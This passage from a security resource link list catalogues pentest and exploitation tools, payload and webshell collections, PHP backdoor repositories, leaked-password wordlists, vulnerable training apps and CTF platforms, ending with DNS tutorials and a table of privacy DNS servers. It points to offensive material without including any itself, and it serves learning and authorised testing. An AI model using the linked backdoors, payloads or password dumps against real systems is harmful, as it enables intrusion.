:small_orange_diamond: <a href="https://github.com/dloss/python-pentest-tools"><b>python-pentest-tools</b></a> - python tools for penetration testers.<br>
:small_orange_diamond: <a href="https://github.com/fuzzdb-project/fuzzdb"><b>fuzzdb</b></a> - dictionary of attack patterns and primitives for black-box application fault injection.<br>
:small_orange_diamond: <a href="https://github.com/google/AFL"><b>AFL</b></a> - is a free software fuzzer maintained by Google.<br>
:small_orange_diamond: <a href="https://github.com/AFLplusplus/AFLplusplus"><b>AFL++</b></a> - is AFL with community patches.<br>
:small_orange_diamond: <a href="https://github.com/google/syzkaller"><b>syzkaller</b></a> - is an unsupervised, coverage-guided kernel fuzzer.<br>
:small_orange_diamond: <a href="https://github.com/pwndbg/pwndbg"><b>pwndbg</b></a> - exploit development and reverse engineering with GDB made easy.<br>
:small_orange_diamond: <a href="https://github.com/longld/peda"><b>GDB PEDA</b></a> - Python Exploit Development Assistance for GDB.<br>
:small_orange_diamond: <a href="https://www.hex-rays.com/products/ida/index.shtml"><b>IDA</b></a> - multi-processor disassembler and debugger useful for reverse engineering malware.<br>
:small_orange_diamond: <a href="https://github.com/radare/radare2"><b>radare2</b></a> - framework for reverse-engineering and analyzing binaries.<br>
:small_orange_diamond: <a href="https://github.com/threat9/routersploit"><b>routersploit</b></a> - exploitation framework for embedded devices.<br>
:small_orange_diamond: <a href="https://github.com/NationalSecurityAgency/ghidra"><b>Ghidra</b></a> - is a software reverse engineering (SRE) framework.<br>
:small_orange_diamond: <a href="https://github.com/salesforce/vulnreport"><b>Vulnreport</b></a> - open-source pentesting management and automation platform by Salesforce Product Security.<br>
:small_orange_diamond: <a href="https://github.com/sc0tfree/mentalist"><b>Mentalist</b></a> - is a graphical tool for custom wordlist generation.<br>
:small_orange_diamond: <a href="https://github.com/archerysec/archerysec"><b>archerysec</b></a> - vulnerability assessment and management helps to perform scans and manage vulnerabilities.<br>
:small_orange_diamond: <a href="https://github.com/j3ssie/Osmedeus"><b>Osmedeus</b></a> - fully automated offensive security tool for reconnaissance and vulnerability scanning.<br>
:small_orange_diamond: <a href="https://github.com/beefproject/beef"><b>beef</b></a> - the browser exploitation framework project.<br>
:small_orange_diamond: <a href="https://github.com/NullArray/AutoSploit"><b>AutoSploit</b></a> - automated mass exploiter.<br>
:small_orange_diamond: <a href="https://github.com/TH3xACE/SUDO_KILLER"><b>SUDO_KILLER</b></a> - is a tool to identify and exploit sudo rules' misconfigurations and vulnerabilities.<br>
:small_orange_diamond: <a href="https://github.com/VirusTotal/yara"><b>yara</b></a> - the pattern matching swiss knife.<br>
:small_orange_diamond: <a href="https://github.com/gentilkiwi/mimikatz"><b>mimikatz</b></a> - a little tool to play with Windows security.<br>
:small_orange_diamond: <a href="https://github.com/sherlock-project/sherlock"><b>sherlock</b></a> - hunt down social media accounts by username across social networks.<br>
:small_orange_diamond: <a href="https://owasp.org/www-project-threat-dragon/"><b>OWASP Threat Dragon</b></a> - is a tool used to create threat model diagrams and to record possible threats.<br>
</p>
##### :black_small_square: Pentests bookmarks collection
<p>
:small_orange_diamond: <a href="http://www.pentest-standard.org/index.php/Main_Page"><b>PTES</b></a> - the penetration testing execution standard.<br>
:small_orange_diamond: <a href="https://www.amanhardikar.com/mindmaps/Practice.html"><b>Pentests MindMap</b></a> - amazing mind map with vulnerable apps and systems.<br>
:small_orange_diamond: <a href="https://www.amanhardikar.com/mindmaps/webapptest.html"><b>WebApps Security Tests MindMap</b></a> - incredible mind map for WebApps security tests.<br>
:small_orange_diamond: <a href="https://brutelogic.com.br/blog/"><b>Brute XSS</b></a> - master the art of Cross Site Scripting.<br>
:small_orange_diamond: <a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet"><b>XSS cheat sheet</b></a> - contains many vectors that can help you bypass WAFs and filters.<br>
:small_orange_diamond: <a href="https://jivoi.github.io/2015/07/03/offensive-security-bookmarks/"><b>Offensive Security Bookmarks</b></a> - security bookmarks collection, all things that author need to pass OSCP.<br>
:small_orange_diamond: <a href="https://github.com/coreb1t/awesome-pentest-cheat-sheets"><b>Awesome Pentest Cheat Sheets</b></a> - collection of the cheat sheets useful for pentesting.<br>
:small_orange_diamond: <a href="https://github.com/Hack-with-Github/Awesome-Hacking"><b>Awesome Hacking by HackWithGithub</b></a> - awesome lists for hackers, pentesters and security researchers.<br>
:small_orange_diamond: <a href="https://github.com/carpedm20/awesome-hacking"><b>Awesome Hacking by carpedm20</b></a> - a curated list of awesome hacking tutorials, tools and resources.<br>
:small_orange_diamond: <a href="https://github.com/vitalysim/Awesome-Hacking-Resources"><b>Awesome Hacking Resources</b></a> - collection of hacking/penetration testing resources to make you better.<br>
:small_orange_diamond: <a href="https://github.com/enaqx/awesome-pentest"><b>Awesome Pentest</b></a> - collection of awesome penetration testing resources, tools and other shiny things.<br>
:small_orange_diamond: <a href="https://github.com/m4ll0k/Awesome-Hacking-Tools"><b>Awesome-Hacking-Tools</b></a> - is a curated list of awesome Hacking Tools.<br>
:small_orange_diamond: <a href="https://github.com/ksanchezcld/Hacking_Cheat_Sheet"><b>Hacking Cheat Sheet</b></a> - author hacking and pentesting notes.<br>
:small_orange_diamond: <a href="https://github.com/toolswatch/blackhat-arsenal-tools"><b>blackhat-arsenal-tools</b></a> - official Black Hat arsenal security tools repository.<br>
:small_orange_diamond: <a href="https://www.peerlyst.com/posts/the-complete-list-of-infosec-related-cheat-sheets-claus-cramon"><b>Penetration Testing and WebApp Cheat Sheets</b></a> - the complete list of Infosec related cheat sheets.<br>
:small_orange_diamond: <a href="https://github.com/The-Art-of-Hacking/h4cker"><b>Cyber Security Resources</b></a> - includes thousands of cybersecurity-related references and resources.<br>
:small_orange_diamond: <a href="https://github.com/jhaddix/pentest-bookmarks"><b>Pentest Bookmarks</b></a> - there are a LOT of pentesting blogs.<br>
:small_orange_diamond: <a href="https://github.com/OlivierLaflamme/Cheatsheet-God"><b>Cheatsheet-God</b></a> - Penetration Testing Reference Bank - OSCP/PTP & PTX Cheatsheet.<br>
:small_orange_diamond: <a href="https://github.com/Cyb3rWard0g/ThreatHunter-Playbook"><b>ThreatHunter-Playbook</b></a> - to aid the development of techniques and hypothesis for hunting campaigns.<br>
:small_orange_diamond: <a href="https://github.com/hmaverickadams/Beginner-Network-Pentesting"><b>Beginner-Network-Pentesting</b></a> - notes for beginner network pentesting course.<br>
:small_orange_diamond: <a href="https://github.com/rewardone/OSCPRepo"><b>OSCPRepo</b></a> - is a list of resources that author have been gathering in preparation for the OSCP.<br>
:small_orange_diamond: <a href="https://github.com/swisskyrepo/PayloadsAllTheThings"><b>PayloadsAllTheThings</b></a> - a list of useful payloads and bypass for Web Application Security and Pentest/CTF.<br>
:small_orange_diamond: <a href="https://github.com/foospidy/payloads"><b>payloads</b></a> - git all the Payloads! A collection of web attack payloads.<br>
:small_orange_diamond: <a href="https://github.com/payloadbox/command-injection-payload-list"><b>command-injection-payload-list</b></a> - command injection payload list.<br>
:small_orange_diamond: <a href="https://github.com/jakejarvis/awesome-shodan-queries"><b>Awesome Shodan Search Queries</b></a> - great search queries to plug into Shodan.<br>
:small_orange_diamond: <a href="https://github.com/s0md3v/AwesomeXSS"><b>AwesomeXSS</b></a> - is a collection of Awesome XSS resources.<br>
:small_orange_diamond: <a href="https://github.com/JohnTroony/php-webshells"><b>php-webshells</b></a> - common php webshells.<br>
:small_orange_diamond: <a href="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/"><b>Pentesting Tools Cheat Sheet</b></a> - a quick reference high level overview for typical penetration testing.<br>
:small_orange_diamond: <a href="https://cheatsheetseries.owasp.org/"><b>OWASP Cheat Sheet Series</b></a> - is a collection of high value information on specific application security topics.<br>
:small_orange_diamond: <a href="https://jeremylong.github.io/DependencyCheck/index.html"><b>OWASP dependency-check</b></a> - is an open source solution the OWASP Top 10 2013 entry.<br>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Proactive_Controls"><b>OWASP ProActive Controls</b></a> - OWASP Top 10 Proactive Controls 2018.<br>
:small_orange_diamond: <a href="https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE"><b>PENTESTING-BIBLE</b></a> - hacking & penetration testing & red team & cyber security resources.<br>
:small_orange_diamond: <a href="https://github.com/nixawk/pentest-wiki"><b>pentest-wiki</b></a> - is a free online security knowledge library for pentesters/researchers.<br>
:small_orange_diamond: <a href="https://media.defcon.org/"><b>DEF CON Media Server</b></a> - great stuff from DEFCON.<br>
:small_orange_diamond: <a href="https://github.com/rshipp/awesome-malware-analysis"><b>Awesome Malware Analysis</b></a> - a curated list of awesome malware analysis tools and resources.<br>
:small_orange_diamond: <a href="https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/"><b>SQL Injection Cheat Sheet</b></a> - detailed technical stuff about the many different variants of the SQL Injection.<br>
:small_orange_diamond: <a href="http://kb.entersoft.co.in/"><b>Entersoft Knowledge Base</b></a> - great and detailed reference about vulnerabilities.<br>
:small_orange_diamond: <a href="http://html5sec.org/"><b>HTML5 Security Cheatsheet</b></a> - a collection of HTML5 related XSS attack vectors.<br>
:small_orange_diamond: <a href="http://evuln.com/tools/xss-encoder/"><b>XSS String Encoder</b></a> - for generating XSS code to check your input validation filters against XSS.<br>
:small_orange_diamond: <a href="https://gtfobins.github.io/"><b>GTFOBins</b></a> - list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.<br>
:small_orange_diamond: <a href="https://guif.re/"><b>Guifre Ruiz Notes</b></a> - collection of security, system, network and pentest cheatsheets.<br>
:small_orange_diamond: <a href="http://blog.safebuff.com/2016/07/03/SSRF-Tips/index.html"><b>SSRF Tips</b></a> - a collection of SSRF Tips.<br>
:small_orange_diamond: <a href="http://shell-storm.org/repo/CTF/"><b>shell-storm repo CTF</b></a> - great archive of CTFs.<br>
:small_orange_diamond: <a href="https://github.com/bl4de/ctf"><b>ctf</b></a> - CTF (Capture The Flag) writeups, code snippets, notes, scripts.<br>
:small_orange_diamond: <a href="https://github.com/orangetw/My-CTF-Web-Challenges"><b>My-CTF-Web-Challenges</b></a> - collection of CTF Web challenges.<br>
:small_orange_diamond: <a href="https://github.com/OWASP/owasp-mstg"><b>MSTG</b></a> - The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security testing.<br>
:small_orange_diamond: <a href="https://github.com/sdcampbell/Internal-Pentest-Playbook"><b>Internal-Pentest-Playbook</b></a> - notes on the most common things for an Internal Network Penetration Test.<br>
:small_orange_diamond: <a href="https://github.com/streaak/keyhacks"><b>KeyHacks</b></a> - shows quick ways in which API keys leaked by a bug bounty program can be checked.<br>
:small_orange_diamond: <a href="https://github.com/securitum/research"><b>securitum/research</b></a> - various Proof of Concepts of security research performed by Securitum.<br>
:small_orange_diamond: <a href="https://github.com/juliocesarfort/public-pentesting-reports"><b>public-pentesting-reports</b></a> - is a list of public pentest reports released by several consulting security groups.<br>
:small_orange_diamond: <a href="https://github.com/djadmin/awesome-bug-bounty"><b>awesome-bug-bounty</b></a> - is a comprehensive curated list of available Bug Bounty.<br>
:small_orange_diamond: <a href="https://github.com/ngalongc/bug-bounty-reference"><b>bug-bounty-reference</b></a> - is a list of bug bounty write-ups.<br>
:small_orange_diamond: <a href="https://github.com/devanshbatham/Awesome-Bugbounty-Writeups"><b>Awesome-Bugbounty-Writeups</b></a> - is a curated list of bugbounty writeups.<br>
:small_orange_diamond: <a href="https://pentester.land/list-of-bug-bounty-writeups.html"><b>Bug bounty writeups</b></a> - list of bug bounty writeups (2012-2020).<br>
:small_orange_diamond: <a href="https://hackso.me/"><b>hackso.me</b></a> - a great journey into security.<br>
</p>
##### :black_small_square: Backdoors/exploits
<p>
:small_orange_diamond: <a href="https://github.com/bartblaze/PHP-backdoors"><b>PHP-backdoors</b></a> - a collection of PHP backdoors. For educational or testing purposes only.<br>
</p>
##### :black_small_square: Wordlists and Weak passwords
<p>
:small_orange_diamond: <a href="https://weakpass.com/"><b>Weakpass</b></a> - for any kind of bruteforce find wordlists or unleash the power of them all at once!<br>
:small_orange_diamond: <a href="https://hashes.org/"><b>Hashes.org</b></a> - is a free online hash resolving service incorporating many unparalleled techniques.<br>
:small_orange_diamond: <a href="https://github.com/danielmiessler/SecLists"><b>SecLists</b></a> - collection of multiple types of lists used during security assessments, collected in one place.<br>
:small_orange_diamond: <a href="https://github.com/berzerk0/Probable-Wordlists"><b>Probable-Wordlists</b></a> - sorted by probability originally created for password generation and testing.<br>
:small_orange_diamond: <a href="https://wiki.skullsecurity.org/index.php?title=Passwords"><b>skullsecurity passwords</b></a> - password dictionaries and leaked passwords repository.<br>
:small_orange_diamond: <a href="https://bezpieka.org/polski-slownik-premium-polish-wordlist"><b>Polish PREMIUM Dictionary</b></a> - official dictionary created by the team on the forum bezpieka.org.<b>*</b> <sup><a href="https://sourceforge.net/projects/kali-linux/files/Wordlist/">1</sup><br>
:small_orange_diamond: <a href="https://github.com/insidetrust/statistically-likely-usernames"><b>statistically-likely-usernames</b></a> - wordlists for creating statistically likely username lists.<br>
</p>
##### :black_small_square: Bounty platforms
<p>
:small_orange_diamond: <a href="https://www.yeswehack.com/"><b>YesWeHack</b></a> - bug bounty platform with infosec jobs.<br>
:small_orange_diamond: <a href="https://www.openbugbounty.org/"><b>Openbugbounty</b></a> - allows any security researcher reporting a vulnerability on any website.<br>
:small_orange_diamond: <a href="https://www.hackerone.com/"><b>hackerone</b></a> - global hacker community to surface the most relevant security issues.<br>
:small_orange_diamond: <a href="https://www.bugcrowd.com/"><b>bugcrowd</b></a> - crowdsourced cybersecurity for the enterprise.<br>
:small_orange_diamond: <a href="https://crowdshield.com/"><b>Crowdshield</b></a> - crowdsourced security & bug bounty management.<br>
:small_orange_diamond: <a href="https://www.synack.com/"><b>Synack</b></a> - crowdsourced security & bug bounty programs, crowd security intelligence platform, and more.<br>
:small_orange_diamond: <a href="https://hacktrophy.com/en/"><b>Hacktrophy</b></a> - bug bounty platform.<br>
</p>
##### :black_small_square: Web Training Apps (local installation)
<p>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project"><b>OWASP-VWAD</b></a> - comprehensive and well maintained registry of all known vulnerable web applications.<br>
:small_orange_diamond: <a href="http://www.dvwa.co.uk/"><b>DVWA</b></a> - PHP/MySQL web application that is damn vulnerable.<br>
:small_orange_diamond: <a href="https://metasploit.help.rapid7.com/docs/metasploitable-2"><b>metasploitable2</b></a> - vulnerable web application amongst security researchers.<br>
:small_orange_diamond: <a href="https://github.com/rapid7/metasploitable3"><b>metasploitable3</b></a> - is a VM that is built from the ground up with a large amount of security vulnerabilities.<br>
:small_orange_diamond: <a href="https://github.com/stamparm/DSVW"><b>DSVW</b></a> - is a deliberately vulnerable web application written in under 100 lines of code.<br>
:small_orange_diamond: <a href="https://sourceforge.net/projects/mutillidae/"><b>OWASP Mutillidae II</b></a> - free, open source, deliberately vulnerable web-application.<br>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Juice_Shop_Project"><b>OWASP Juice Shop Project</b></a> - the most bug-free vulnerable application in existence.<br>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project"><b>OWASP Node js Goat Project</b></a> - OWASP Top 10 security risks apply to web apps developed using Node.js.<br>
:small_orange_diamond: <a href="https://github.com/iteratec/juicy-ctf"><b>juicy-ctf</b></a> - run Capture the Flags and Security Trainings with OWASP Juice Shop.<br>
:small_orange_diamond: <a href="https://github.com/OWASP/SecurityShepherd"><b>SecurityShepherd</b></a> - web and mobile application security training platform.<br>
:small_orange_diamond: <a href="https://github.com/opendns/Security_Ninjas_AppSec_Training"><b>Security Ninjas</b></a> - open source application security training program.<br>
:small_orange_diamond: <a href="https://github.com/rapid7/hackazon"><b>hackazon</b></a> - a modern vulnerable web app.<br>
:small_orange_diamond: <a href="https://github.com/appsecco/dvna"><b>dvna</b></a> - damn vulnerable NodeJS application.<br>
:small_orange_diamond: <a href="https://github.com/DefectDojo/django-DefectDojo"><b>django-DefectDojo</b></a> - is an open-source application vulnerability correlation and security orchestration tool.<br>
:small_orange_diamond: <a href="https://google-gruyere.appspot.com/"><b>Google Gruyere</b></a> - web application exploits and defenses.<br>
:small_orange_diamond: <a href="https://github.com/amolnaik4/bodhi"><b>Bodhi</b></a> - is a playground focused on learning the exploitation of client-side web vulnerabilities.<br>
:small_orange_diamond: <a href="https://websploit.h4cker.org/"><b>Websploit</b></a> - single vm lab with the purpose of combining several vulnerable appliations in one environment.<br>
:small_orange_diamond: <a href="https://github.com/vulhub/vulhub"><b>vulhub</b></a> - pre-built Vulnerable Environments based on docker-compose.<br>
:small_orange_diamond: <a href="https://rhinosecuritylabs.com/aws/introducing-cloudgoat-2/"><b>CloudGoat 2</b></a> - the new & improved "Vulnerable by Design"
AWS deployment tool.<br>
:small_orange_diamond: <a href="https://github.com/globocom/secDevLabs"><b>secDevLabs</b></a> - is a laboratory for learning secure web development in a practical manner.<br>
:small_orange_diamond: <a href="https://github.com/incredibleindishell/CORS-vulnerable-Lab"><b>CORS-vulnerable-Lab</b></a> - sample vulnerable code and its exploit code.<br>
:small_orange_diamond: <a href="https://github.com/moloch--/RootTheBox"><b>RootTheBox</b></a> - a Game of Hackers (CTF Scoreboard & Game Manager).<br>
:small_orange_diamond: <a href="https://application.security/"><b>KONTRA</b></a> - application security training (OWASP Top Web & Api).<br>
</p>
##### :black_small_square: Labs (ethical hacking platforms/trainings/CTFs)
<p>
:small_orange_diamond: <a href="https://www.offensive-security.com/"><b>Offensive Security</b></a> - true performance-based penetration testing training for over a decade.<br>
:small_orange_diamond: <a href="https://www.hackthebox.eu/"><b>Hack The Box</b></a> - online platform allowing you to test your penetration testing skills.<br>
:small_orange_diamond: <a href="https://www.hacking-lab.com/index.html"><b>Hacking-Lab</b></a> - online ethical hacking, computer network and security challenge platform.<br>
:small_orange_diamond: <a href="http://pwnable.kr/index.php"><b>pwnable.kr</b></a> - non-commercial wargame site which provides various pwn challenges.<br>
:small_orange_diamond: <a href="https://pwnable.tw/"><b>Pwnable.tw</b></a> - is a wargame site for hackers to test and expand their binary exploiting skills.<br>
:small_orange_diamond: <a href="https://picoctf.com/"><b>picoCTF</b></a> - is a free computer security game targeted at middle and high school students.<br>
:small_orange_diamond: <a href="https://ctflearn.com/"><b>CTFlearn</b></a> - is an online platform built to help ethical hackers learn and practice their cybersecurity knowledge.<br>
:small_orange_diamond: <a href="https://ctftime.org/"><b>ctftime</b></a> - CTF archive and a place, where you can get some another CTF-related info.<br>
:small_orange_diamond: <a href="https://silesiasecuritylab.com/"><b>Silesia Security Lab</b></a> - high quality security testing services.<br>
:small_orange_diamond: <a href="https://practicalpentestlabs.com/"><b>Practical Pentest Labs</b></a> - pentest lab, take your Hacking skills to the next level.<br>
:small_orange_diamond: <a href="https://www.root-me.org/?lang=en"><b>Root Me</b></a> - the fast, easy, and affordable way to train your hacking skills.<br>
:small_orange_diamond: <a href="https://rozwal.to/login"><b>rozwal.to</b></a> - a great platform to train your pentesting skills.<br>
:small_orange_diamond: <a href="https://tryhackme.com/"><b>TryHackMe</b></a> - learning Cyber Security made easy.<br>
:small_orange_diamond: <a href="https://hackxor.net/"><b>hackxor</b></a> - is a realistic web application hacking game, designed to help players of all abilities develop their skills.<br>
:small_orange_diamond: <a href="http://hack-yourself-first.com/"><b>Hack Yourself First</b></a> - it's full of nasty app sec holes.<br>
:small_orange_diamond: <a href="http://overthewire.org/wargames/"><b>OverTheWire</b></a> - can help you to learn and practice security concepts in the form of fun-filled games.<br>
:small_orange_diamond: <a href="https://labs.wizard-security.net/"><b>Wizard Labs</b></a> - is an online Penetration Testing Lab.<br>
:small_orange_diamond: <a href="https://pentesterlab.com/"><b>PentesterLab</b></a> - provides vulnerable systems that can be used to test and understand vulnerabilities.<br>
:small_orange_diamond: <a href="https://ringzer0ctf.com/"><b>RingZer0</b></a> - tons of challenges designed to test and improve your hacking skills.<br>
:small_orange_diamond: <a href="http://www.try2hack.nl/"><b>try2hack</b></a> - several security-oriented challenges for your entertainment.<br>
:small_orange_diamond: <a href="https://www.ubeeri.com/preconfig-labs"><b>Ubeeri</b></a> - preconfigured lab environments.<br>
:small_orange_diamond: <a href="https://lab.pentestit.ru/"><b>Pentestit</b></a> - emulate IT infrastructures of real companies for legal pen testing and improving pentest skills.<br>
:small_orange_diamond: <a href="https://microcorruption.com/login"><b>Microcorruption</b></a> - reversal challenges done in the web interface.<br>
:small_orange_diamond: <a href="https://crackmes.one/"><b>Crackmes</b></a> - download crackmes to help improve your reverse engineering skills.<br>
:small_orange_diamond: <a href="https://domgo.at/cxss/intro"><b>DomGoat</b></a> - DOM XSS security learning and practicing platform.<br>
:small_orange_diamond: <a href="https://chall.stypr.com"><b>Stereotyped Challenges</b></a> - upgrade your web hacking techniques today!<br>
:small_orange_diamond: <a href="https://www.vulnhub.com/"><b>Vulnhub</b></a> - allows anyone to gain practical 'hands-on' experience in digital security.<br>
:small_orange_diamond: <a href="https://w3challs.com/"><b>W3Challs</b></a> - is a penetration testing training platform, which offers various computer challenges.<br>
:small_orange_diamond: <a href="https://ringzer0ctf.com/challenges"><b>RingZer0 CTF</b></a> - offers you tons of challenges designed to test and improve your hacking skills.<br>
:small_orange_diamond: <a href="https://hack.me/"><b>Hack.me</b></a> - a platform where you can build, host and share vulnerable web apps for educational purposes.<br>
:small_orange_diamond: <a href="https://www.hackthis.co.uk/levels/"><b>HackThis!</b></a> - discover how hacks, dumps and defacements are performed and secure your website.<br>
:small_orange_diamond: <a href="https://www.enigmagroup.org/#"><b>Enigma Group WebApp Training</b></a> - these challenges cover the exploits listed in the OWASP Top 10 Project.<br>
:small_orange_diamond: <a href="https://challenges.re/"><b>Reverse Engineering Challenges</b></a> - challenges, exercises, problems and tasks - by level, by type, and more.<br>
:small_orange_diamond: <a href="https://0x00sec.org/"><b>0x00sec</b></a> - the home of the Hacker - Malware, Reverse Engineering, and Computer Science.<br>
:small_orange_diamond: <a href="https://www.wechall.net/challs"><b>We Chall</b></a> - there are exist a lots of different challenge types.<br>
:small_orange_diamond: <a href="https://www.hackergateway.com/"><b>Hacker Gateway</b></a> - is the go-to place for hackers who want to test their skills.<br>
:small_orange_diamond: <a href="https://www.hacker101.com/"><b>Hacker101</b></a> - is a free class for web security.<br>
:small_orange_diamond: <a href="https://contained.af/"><b>contained.af</b></a> - a stupid game for learning about containers, capabilities, and syscalls.<br>
:small_orange_diamond: <a href="http://flaws.cloud/"><b>flAWS challenge!</b></a> - a series of levels you'll learn about common mistakes and gotchas when using AWS.<br>
:small_orange_diamond: <a href="https://cybersecurity.wtf"><b>CyberSec WTF</b></a> - provides web hacking challenges derived from bounty write-ups.<br>
:small_orange_diamond: <a href="https://ctfchallenge.co.uk/login"><b>CTF Challenge</b></a> - CTF Web App challenges.<br>
:small_orange_diamond: <a href="https://capturetheflag.withgoogle.com"><b>gCTF</b></a> - most of the challenges used in the Google CTF 2017.<br>
:small_orange_diamond: <a href="https://www.hackthissite.org/pages/index/index.php"><b>Hack This Site</b></a> - is a free, safe and legal training ground for hackers.<br>
:small_orange_diamond: <a href="https://attackdefense.com"><b>Attack & Defense</b></a> - is a browser-based cloud labs.<br>
:small_orange_diamond: <a href="https://cryptohack.org/"><b>Cryptohack</b></a> - a fun platform for learning modern cryptography.<br>
:small_orange_diamond: <a href="https://cryptopals.com/"><b>Cryptopals</b></a> - the cryptopals crypto challenges.<br>
</p>
##### :black_small_square: CTF platforms
<p>
:small_orange_diamond: <a href="https://github.com/facebook/fbctf"><b>fbctf</b></a> - platform to host Capture the Flag competitions.<br>
:small_orange_diamond: <a href="https://github.com/google/ctfscoreboard"><b>ctfscoreboard</b></a> - scoreboard for Capture The Flag competitions.<br>
</p>
##### :black_small_square: Other resources
<p>
:small_orange_diamond: <a href="https://github.com/bugcrowd/bugcrowd_university"><b>Bugcrowd University</b></a> - open source education content for the researcher community.<br>
:small_orange_diamond: <a href="https://github.com/rewardone/OSCPRepo"><b>OSCPRepo</b></a> - a list of resources and scripts that I have been gathering in preparation for the OSCP.<br>
:small_orange_diamond: <a href="https://medium.com/@cxosmo/owasp-top-10-real-world-examples-part-1-a540c4ea2df5"><b>OWASP Top 10: Real-World Examples</b></a> - test your web apps with real-world examples (two-part series).<br>
:small_orange_diamond: <a href="http://phrack.org/index.html"><b>phrack.org</b></a> - an awesome collection of articles from several respected hackers and other thinkers.<br>
:small_orange_diamond: <a href="https://github.com/Gr1mmie/Practical-Ethical-Hacking-Resources"><b>Practical-Ethical-Hacking-Resources</b></a> - compilation of resources from TCM's Udemy Course.<br>
</p>
#### Your daily knowledge and news [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: RSS Readers
<p>
:small_orange_diamond: <a href="https://feedly.com/"><b>Feedly</b></a> - organize, read and share what matters to you.<br>
:small_orange_diamond: <a href="https://www.inoreader.com/"><b>Inoreader</b></a> - similar to feedly with a support for filtering what you fetch from rss.<br>
</p>
##### :black_small_square: IRC Channels
<p>
:small_orange_diamond: <a href="https://wiki.hackerspaces.org/IRC_Channel"><b>#hackerspaces</b></a> - hackerspace IRC channels.<br>
</p>
##### :black_small_square: Security
<p>
:small_orange_diamond: <a href="https://thehackernews.com/"><b>The Hacker News</b></a> - leading news source dedicated to promoting awareness for security experts and hackers.<br>
:small_orange_diamond: <a href="https://latesthackingnews.com/"><b>Latest Hacking News</b></a> - provides the latest hacking news, exploits and vulnerabilities for ethical hackers.<br>
:small_orange_diamond: <a href="https://securitynewsletter.co/"><b>Security Newsletter</b></a> - security news as a weekly digest (email notifications).<br>
:small_orange_diamond: <a href="https://security.googleblog.com/"><b>Google Online Security Blog</b></a> - the latest news and insights from Google on security and safety on the Internet.<br>
:small_orange_diamond: <a href="https://blog.qualys.com/"><b>Qualys Blog</b></a> - expert network security guidance and news.<br>
:small_orange_diamond: <a href="https://www.darkreading.com/"><b>DARKReading</b></a> - connecting the Information Security Community.<br>
:small_orange_diamond: <a href="https://www.darknet.org.uk/"><b>Darknet</b></a> - latest hacking tools, hacker news, cybersecurity best practices, ethical hacking & pen-testing.<br>
:small_orange_diamond: <a href="https://twitter.com/disclosedh1"><b>publiclyDisclosed</b></a> - public disclosure watcher who keeps you up to date about the recently disclosed bugs.<br>
:small_orange_diamond: <a href="https://www.reddit.com/r/hacking/"><b>Reddit - Hacking</b></a> - a subreddit dedicated to hacking and hackers.<br>
:small_orange_diamond: <a href="https://packetstormsecurity.com/"><b>Packet Storm</b></a> - information security services, news, files, tools, exploits, advisories and whitepapers.<br>
:small_orange_diamond: <a href="https://sekurak.pl/"><b>Sekurak</b></a> - about security, penetration tests, vulnerabilities and many others (PL/EN).<br>
:small_orange_diamond: <a href="https://nfsec.pl/"><b>nf.sec</b></a> - basic aspects and mechanisms of Linux operating system security (PL).<br>
</p>
##### :black_small_square: Other/All-in-one
<p>
:small_orange_diamond: <a href="https://changelog.com/"><b>Changelog</b></a> - is a community of hackers; news & podcasts for developers and hackers.<br>
</p>
#### Other Cheat Sheets [<sup>[TOC]</sup>](#anger-table-of-contents)
###### Build your own DNS Servers
<p>
:small_orange_diamond: <a href="https://calomel.org/unbound_dns.html"><b>Unbound DNS Tutorial</b></a> - a validating, recursive, and caching DNS server.<br>
:small_orange_diamond: <a href="https://www.ctrl.blog/entry/knot-dns-resolver-tutorial.html"><b>Knot Resolver on Fedora</b></a> - how to get faster and more secure DNS resolution with Knot Resolver on Fedora.<br>
:small_orange_diamond: <a href="https://www.aaflalo.me/2018/10/tutorial-setup-dns-over-https-server/"><b>DNS-over-HTTPS</b></a> - tutorial to setup your own DNS-over-HTTPS (DoH) server.<br>
:small_orange_diamond: <a href="https://hacks.mozilla.org/2018/05/a-cartoon-intro-to-dns-over-https/"><b>dns-over-https</b></a> - a cartoon intro to DNS over HTTPS.<br>
:small_orange_diamond: <a href="https://www.aaflalo.me/2019/03/dns-over-tls/"><b>DNS-over-TLS</b></a> - following to your DoH server, setup your DNS-over-TLS (DoT) server.<br>
:small_orange_diamond: <a href="https://zwischenzugs.com/2018/01/26/how-and-why-i-run-my-own-dns-servers/"><b>DNS Servers</b></a> - how (and why) i run my own DNS Servers.<br>
</p>
###### Build your own Certificate Authority
<p>
:small_orange_diamond: <a href="https://jamielinux.com/docs/openssl-certificate-authority/"><b>OpenSSL Certificate Authority</b></a> - build your own certificate authority (CA) using the OpenSSL tools.<br>
:small_orange_diamond: <a href="https://github.com/smallstep/certificates"><b>step-ca Certificate Authority</b></a> - build your own certificate authority (CA) using open source step-ca.<br>
</p>
###### Build your own System/Virtual Machine
<p>
:small_orange_diamond: <a href="https://github.com/cfenollosa/os-tutorial"><b>os-tutorial</b></a> - how to create an OS from scratch.<br>
:small_orange_diamond: <a href="https://justinmeiners.github.io/lc3-vm/"><b>Write your Own Virtual Machine</b></a> - how to write your own virtual machine (VM).<br>
:small_orange_diamond: <a href="https://github.com/cirosantilli/x86-bare-metal-examples"><b>x86 Bare Metal Examples</b></a> - dozens of minimal operating systems to learn x86 system programming.<br>
:small_orange_diamond: <a href="https://github.com/djhworld/simple-computer"><b>simple-computer</b></a> - the scott CPU from "But How Do It Know?" by J. Clark Scott.<br>
:small_orange_diamond: <a href="https://littleosbook.github.io/"><b>littleosbook</b></a> - the little book about OS development.<br>
</p>
###### DNS Servers list (privacy)
| <b><u>IP</u></b> | <b><u>URL</u></b> |
| :--- | :--- |
| **`84.200.69.80`** | [dns.watch](https://dns.watch/) |
| **`94.247.43.254`** | [opennic.org](https://www.opennic.org/) |
| **`64.6.64.6`** | [verisign.com](https://www.verisign.com/en_US/security-services/public-dns/index.xhtml) |
| **`89.233.43.71`** | [censurfridns.dk](https://blog.uncensoreddns.org/) |
